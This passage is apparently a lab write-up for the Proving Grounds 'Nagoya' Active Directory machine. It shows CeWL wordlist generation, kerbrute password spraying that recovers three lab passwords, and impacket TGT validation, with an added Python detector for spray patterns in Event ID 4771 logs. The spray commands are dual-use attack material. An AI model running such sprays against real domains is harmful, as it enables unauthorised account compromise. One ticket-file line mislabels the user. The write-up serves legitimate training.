Password


Although a large number of valid domain users have been discovered and validated, no credential is known at this time.

Cewl


The /index page contains many words relevant to the target organization's operations, some of which could plausibly appear in a user's password.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ cewl http://$IP/index -d 0 -m 7 --with-numbers -w wordlist.txt
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Generating a wordlist from the /index page (minimum word length 7, numbers included).

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ cat ./users.txt | while read -r user; do kerbrute bruteuser --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM ./wordlist.txt "$user"; done 

All attempts failed.

Solution


The solution turned out to rest on a rather unrealistic expectation: it is claimed that people tend to use their favourite season or location together with the year as a password, i.e.

  • <SEASON>+<YEAR>
  • <LOCATION>+<YEAR>

The year is 2023 and the organization is in Nagoya.

Password Spray


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ kerbrute passwordspray --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM ./users.txt "Nagoya2023"     
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 04/23/25 - Ronnie Flathers @ropnop
 
2025/04/23 18:06:52 >  Using KDC(s):
2025/04/23 18:06:52 >  	nagoya.nagoya-industries.com:88
 
2025/04/23 18:06:52 >  [+] VALID LOGIN:	 andrea.hayes@NAGOYA-INDUSTRIES.COM:Nagoya2023
2025/04/23 18:06:52 >  Done! Tested 28 logins (1 successes) in 0.234 seconds

A password spray with the password Nagoya2023 was successful; it belongs to the andrea.hayes user.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ kerbrute passwordspray --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM ./users.txt "Summer2023"
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 04/23/25 - Ronnie Flathers @ropnop
 
2025/04/23 18:08:30 >  Using KDC(s):
2025/04/23 18:08:30 >  	nagoya.nagoya-industries.com:88
 
2025/04/23 18:08:30 >  [+] VALID LOGIN:	 fiona.clark@NAGOYA-INDUSTRIES.COM:Summer2023
2025/04/23 18:08:30 >  Done! Tested 28 logins (1 successes) in 0.203 seconds
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ kerbrute passwordspray --dc nagoya.nagoya-industries.com -d NAGOYA-INDUSTRIES.COM ./users.txt "Spring2023"
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 04/23/25 - Ronnie Flathers @ropnop
 
2025/04/23 18:08:36 >  Using KDC(s):
2025/04/23 18:08:36 >  	nagoya.nagoya-industries.com:88
 
2025/04/23 18:08:36 >  [+] VALID LOGIN:	 craig.carr@NAGOYA-INDUSTRIES.COM:Spring2023
2025/04/23 18:08:37 >  Done! Tested 28 logins (1 successes) in 0.182 seconds

Two additional credentials were found:

  • fiona.clark:Summer2023
  • craig.carr:Spring2023
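The sprays above tested 28 logins from one host in about a fifth of a second; on the domain controller each wrong-password attempt surfaces as Security Event ID 4771 (Kerberos pre-authentication failed, status 0x18). As an added defender-side example, not part of the original writeup, the Python below runs a sliding-window check over constructed 4771-style records and flags any source that fails pre-authentication for many distinct accounts within a short window, while a single account failing repeatedly (a mistyped password) is not flagged. The sample lines, the window and the threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample modelled on Event ID 4771; 0x18 = wrong password.
# Fields: timestamp, client address, target account, failure code.
SAMPLE_4771 = """\
2025-04-23T18:06:52 192.168.45.200 andrea.hayes 0x18
2025-04-23T18:06:52 192.168.45.200 fiona.clark 0x18
2025-04-23T18:06:52 192.168.45.200 craig.carr 0x18
2025-04-23T18:06:52 192.168.45.200 user04 0x18
2025-04-23T18:06:52 192.168.45.200 user05 0x18
2025-04-23T18:06:53 192.168.45.200 user06 0x18
2025-04-23T18:06:53 192.168.45.200 user07 0x18
2025-04-23T18:06:53 192.168.45.200 user08 0x18
2025-04-23T18:06:53 192.168.45.200 user09 0x18
2025-04-23T18:20:00 10.10.1.17 fiona.clark 0x18
2025-04-23T18:20:09 10.10.1.17 fiona.clark 0x18
"""

def parse_events(text):
    """One event per line -> (datetime, client_ip, account, code)."""
    events = []
    for line in text.splitlines():
        ts, ip, account, code = line.split()
        events.append((datetime.fromisoformat(ts), ip, account, code))
    return events

def detect_spray(events, window=timedelta(minutes=5), min_accounts=8):
    """Map client_ip -> sorted accounts for every source whose wrong-password
    failures cover at least min_accounts distinct accounts inside `window`."""
    by_ip = defaultdict(list)
    for ts, ip, account, code in events:
        if code == "0x18":  # ignore clock skew, expired passwords, etc.
            by_ip[ip].append((ts, account))
    hits = {}
    for ip, fails in by_ip.items():
        fails.sort()
        start, best = 0, set()
        for end in range(len(fails)):  # sliding window over sorted failures
            while fails[end][0] - fails[start][0] > window:
                start += 1
            accounts = {a for _, a in fails[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            hits[ip] = sorted(best)
    return hits
```

Tuning the threshold against the organization's normal failure rate matters: a low bar catches slow "one password per day" sprays, a high bar avoids paging on help-desk resets.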

Validation


Validating the credentials above by requesting a TGT for each user.

andrea.hayes User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -dc-ip $IP          
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Nagoya2023
[*] Saving ticket in andrea.hayes@nagoya.nagoya-industries.com.ccache

Validated: a TGT was issued for the andrea.hayes user.

fiona.clark User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/fiona.clark@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Summer2023
[*] Saving ticket in fiona.clark@nagoya.nagoya-industries.com.ccache

Validated: a TGT was issued for the fiona.clark user.

craig.carr User

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-getTGT NAGOYA-INDUSTRIES.COM/craig.carr@nagoya.nagoya-industries.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Spring2023
[*] Saving ticket in fiona.clark@nagoya.nagoya-industries.com.ccache

Validated: a TGT was issued for the craig.carr user.